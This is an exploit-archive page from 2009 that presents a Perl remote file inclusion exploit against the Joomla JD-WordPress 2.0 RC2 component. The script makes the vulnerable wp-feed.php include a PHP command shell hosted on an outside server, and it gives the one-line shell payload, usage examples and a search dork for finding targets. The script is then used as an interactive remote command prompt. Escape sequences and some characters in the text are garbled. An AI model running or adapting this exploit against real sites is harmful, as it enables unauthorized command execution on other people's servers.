[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Joomla JD-WordPress 2.0 RC2 remote file icnlusion
# Published : 2009-10-19
# Author : Don Tukulesto
# Previous Title : Joomla Book Library 1.0 file inclusion
# Next Title : phpCMS 2008 file disclosure


#!/usr/bin/perl

#####
# [+] Author	: Don Tukulesto (root@indonesiancoder.com)
# [+] Date 	: October 20, 2009
# [+] Homepage	: http://www.indonesiancoder.com
# [+] Vendor 	: www.joomladeveloping.org
# [+] version 	: 2.0 RC2
# [+] Method	: Remote File Inclusion 
# [+] Dork 	: "Kill-9"+"IndonesianCoder"
# [+] Location 	: INDONESIA
# [~] Notes	: Jika kami bersama, Nyalakan tanda bahaya. Jika kami berpesta, Hening akan terpecah.
# Aku dia dan mereka, Memang gila memang beda. Tak perlu berpura pura, Memang begini adanya. ( SupermanIsDead ft. Shaggy Dog )
# to M3NW5	: Kembalilah ke jalan mu nak, jangan berpaling dari "Nya"
# to kaMtiEz	: thx yah !!!! � 15 Jam dapet hasil jg :"> ( tunggulah aku di kotamu )
# to MALINGSIAL	: TRULLY THIEF IN ASIA ! N.A.T.O BIATCH !
# [~] How To	:
# perl tux.pl <target> <weapon url> cmd
# perl tux.pl http://127.0.0.1/path/ http://www.indonesiancoder.org/shell.txt cmd
# Weapon example: <?php system($_GET['cmd']); ?>
#####
use HTTP::Request;
use LWP::UserAgent;
$Tux = $ARGV[0];
$Pathloader = $ARGV[1];
$Contrex = $ARGV[2];
if($Tux!~/http:/// || $Pathloader!~/http:/// || !$Contrex){usage()}
head();
sub head()
 {
 print "[o]============================================================================[o]rn";
 print " |		Joomla JD-WordPress Vulnerability File Inclusion		|rn";
 print "[o]============================================================================[o]rn";
 }
while()
{
      print "[w00t] $";
while(<STDIN>)
      {
              $kaMtiEz=$_;
              chomp($kaMtiEz);
$arianom = LWP::UserAgent->new() or die;
$tiw0L = HTTP::Request->new(GET =>$Tux.'components/com_jd-wp/wp-feed.php?mosConfig_absolute_path='.$Pathloader.'?&'.$Contrex.'='.$kaMtiEz)or die "nCould Not connectn";
$abah_benu = $arianom->request($tiw0L);
$tukulesto = $abah_benu->content;
$tukulesto =~ tr/[n]/[&#65533;]/;
if (!$kaMtiEz) {print "nPlease Enter a Commandnn"; $tukulesto ="";}
elsif ($tukulesto =~/failed to open stream: HTTP request denied!/ || $tukulesto =~/: Cannot execute a blank command in /)
      {print "nCann't Connect to cmd Host or Invalid Commandn";exit}
elsif ($tukulesto =~/^<br./>.<b>Fatal.error/) {print "nInvalid Command or No Returnnn"}
if($tukulesto =~ /(.*)/)
{
      $finreturn = $1;
      $finreturn=~ tr/[&#65533;]/[n]/;
      print "rn$finreturnnr";
      last;
}
else {print "[w00t] $";}}}last;
sub usage()
 {
 head();
 print " | Usage:  perl tux.pl <target> <weapon url> <cmd>                              |rn";
 print " | <Site> - Full path to execute ex: http://127.0.0.1/path/                     |rn";
 print " | <Weapon url> - Path to Shell e.g http://www.indonesiancoder.org/shell.txt    |rn";
 print " | <cmd> - Command variable used in php shell                                   |rn";
 print "[o]============================================================================[o]rn";
 print " | 	IndonesianCoder Team | KILL-9 CREW | ServerIsDown | AntiSecurity.org    |rn";
 print " |   kaMtiEz, M3NW5, arianom, tiw0L, Pathloader, abah_benu, VycOd, Gh4mb4S      |rn";
 print " |  Jack-, Contrex, yadoy666, Ronz, noname, s4va, gonzhack, cyb3r_tron, saint   |rn";
 print " |    Awan Bejat, Plaque, rey_cute, BennyCooL, SurabayaHackerLink Team and YOU! |rn";
 print "[o]============================================================================[o]rn";
 print " |	http://www.IndonesianCoder.org	   |	http://www.AntiSecRadio.fm 	|rn";
 print "[o]============================================================================[o]rn";
 exit();
 }